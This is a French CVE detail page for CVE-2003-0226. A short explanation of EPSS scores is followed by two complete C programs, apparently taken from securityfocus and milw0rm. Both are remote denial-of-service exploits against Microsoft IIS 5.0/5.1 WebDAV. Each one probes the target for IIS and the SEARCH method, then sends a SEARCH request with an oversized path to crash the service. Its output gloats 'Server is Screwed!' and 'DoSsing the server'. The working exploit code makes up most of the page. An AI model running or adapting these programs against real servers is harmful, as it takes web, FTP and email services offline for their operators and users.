CVE-2003-0226 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* source: https://www.securityfocus.com/bid/7735/info Microsoft Internet Information Services has been reported vulnerable to a denial of service. When WebDAV receives excessively long requests to the 'PROPFIND' or 'SEARCH' variables, the IIS service will fail. All current web, FTP, and email sessions will be terminated. IIS will automatically restart and normal service will resume. ** It has been reported that if a WebDAV request with a certain number of bytes is received, the Inetinfo service will remain alive but cease serving requests. This will cause the IIS server to stop serving requests until the service is manually restarted. */ /* IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+ Bid: 7735 */ #define ERROR -1 #define OK 1 #ifdef HAVE_CONFIG_H #include <config.h> #endif #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <string.h> int check_for_iis(); void screw_iis(); void usage(); char IP[15]; int main(int argc, char *argv[]) { /* cout << "Hello, World!" << endl; */ if(argc !=2) { usage(); exit(0); } printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n"); strcpy(IP, argv[1]); if(check_for_iis() != OK) { printf("Sorry, BAD LUCK! \n"); exit(0); } screw_iis(); return EXIT_SUCCESS; } int check_for_iis() { int sck, flag = 1; struct sockaddr_in sin; char req[50]; sck = socket(AF_INET, SOCK_STREAM, 0); if(sck == ERROR) { perror("Socket error "); exit(0); } sin.sin_port = htons(80); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(IP); if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1) { perror("Connect Error "); exit(0); } strcpy(req, "GET / HTTP/1.0\r\n\n"); send(sck, req, sizeof(req), 0); recv(sck, req, sizeof(req), 0); if (strstr(req,"IIS") == NULL) { printf(" Not an IIS server! \n"); flag = 0; } sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40); send(sck, req, sizeof(req), 0); recv(sck, req, sizeof(req), 0); if (strstr(req,"HTTP/1.1 411 Length Required") == NULL) { printf("METHOD SEARCH NOT ALLOWED. \n"); flag = 0; } return(flag); } void screw_iis() { int sck, flag = 1; struct sockaddr_in sin; char junk[100]; char buffer[65535] =""; char request[80000]; char content[] = "<?xml version=\"1.0\"?>\r\n" "<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\n" "Select \"DAV:displayname\" from scope()\r\n" "</g:sql>\r\n" "</g:searchrequest>\r\n"; sck = socket(AF_INET, SOCK_STREAM, 0); if(sck == ERROR) { perror("Socket error "); exit(0); } sin.sin_port = htons(80); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(IP); if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1) { perror("Connect Error "); exit(0); } buffer[sizeof(buffer)]=0x00; memset(buffer,'S',sizeof(buffer)); memset(request,0,sizeof(request)); memset(junk,0,sizeof(junk)); sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon tent-Length: ",buffer,IP); sprintf(request,"%s%d\r\n\r\n",request,strlen(content)); printf("\r\nScrewing the server... \n"); send(sck,request,strlen(request),0); send(sck,content,strlen(content),0); recv(sck,junk,sizeof(junk),0); if(junk[0]==0x00) { printf("Server is Screwed! \r\n"); } else { printf("BAD LUCK. Patched.\n"); } } void usage() { printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n"); printf("Usage\r\n"); printf("Screw_IIS <victim IP>\n"); }

/* Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit that makes use of the vulnerability recently published by SPI dynamics Published on 31.05.2003 */ #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment (lib,"ws2_32") void graphitte() {printf("\n********************************** "); printf("\n Webdav MICROSOFT IIS DoS Exploit * \n"); printf("+++++++++++++++++++++++++++++++*\n"); printf(" by Shachank Pandrey *\n"); printf("*************************************\n"); } char *funk(char tobesent[100],char *host) { int s; char got[100]; WSADATA wsaData; struct hostent *yo; struct sockaddr_in heck; char lala[100]; if(WSAStartup(0x0101,&wsaData)!=0) { printf("error starting winsock.."); return 0; } if ((yo = gethostbyname(host))==0){ printf("error: can't resolve '%s'",host); return 0; } heck.sin_port = htons(80); heck.sin_family = AF_INET; heck.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("Error: Unable to create socket"); } if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){ printf("Error: Cudn't Connect\r\n"); } memset(lala,0,sizeof(lala)); sprintf(lala,"%s",tobesent,sizeof(tobesent)); send(s,lala,strlen(lala),0); recv(s,got,100,0); return got; closesocket(s); WSACleanup(); printf("done.\n"); } int main(int argc, char *argv[]) { WSADATA wsaData; int s;char mysend[100]; char *gotme; char trash[100]; struct hostent *yo; struct sockaddr_in heck; char buffer[65535] =""; char myrequest[80000]; char content[] = "<?xml version=\"1.0\"?>\r\n" "<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\n" "Select \"DAV:displayname\" from scope()\r\n" "</g:sql>\r\n" "</g:searchrequest>\r\n"; graphitte(); if(WSAStartup(0x0101,&wsaData)!=0) { printf("Error :Cudn't initiate winsock!"); return 0; } if(argc<2) {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]); exit(0);} if ( (yo = gethostbyname(argv[1]))==0) { printf("error: can't resolve '%s'",argv[1]); return 1; } printf("\nChecking web server %s\n",argv[1]); gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]); if (strstr(gotme,"IIS/5.0") == NULL) { printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]); } else { printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]); sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40); gotme=(char *)funk(mysend,argv[1]); if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL) { printf("\n\r----> METHOD SEARCH ALLOWED\r\n"); } else { printf("\n----> Method SEARCH not Allowed ! adios...\n"); exit(0); } heck.sin_port = htons(80); heck.sin_family = AF_INET; heck.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("error: can't create socket"); return 1; } if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){ printf("Error:Cudn't Connect\r\n"); return 1; } buffer[sizeof(buffer)]=0x00; memset(buffer,'S',sizeof(buffer)); memset(myrequest,0,sizeof(myrequest)); memset(trash,0,sizeof(trash)); sprintf(myrequest,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\ nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]); sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content)); printf("\r\nDoSsing the server...<pray>\n"); send(s,myrequest,strlen(myrequest),0); send(s,content,strlen(content),0); recv(s,trash,sizeof(trash),0); if(trash[0]==0x00) { printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n"); } else printf("Server is prolly patched.\r\n"); closesocket(s); } WSACleanup(); return 1; } // milw0rm.com [2003-05-31]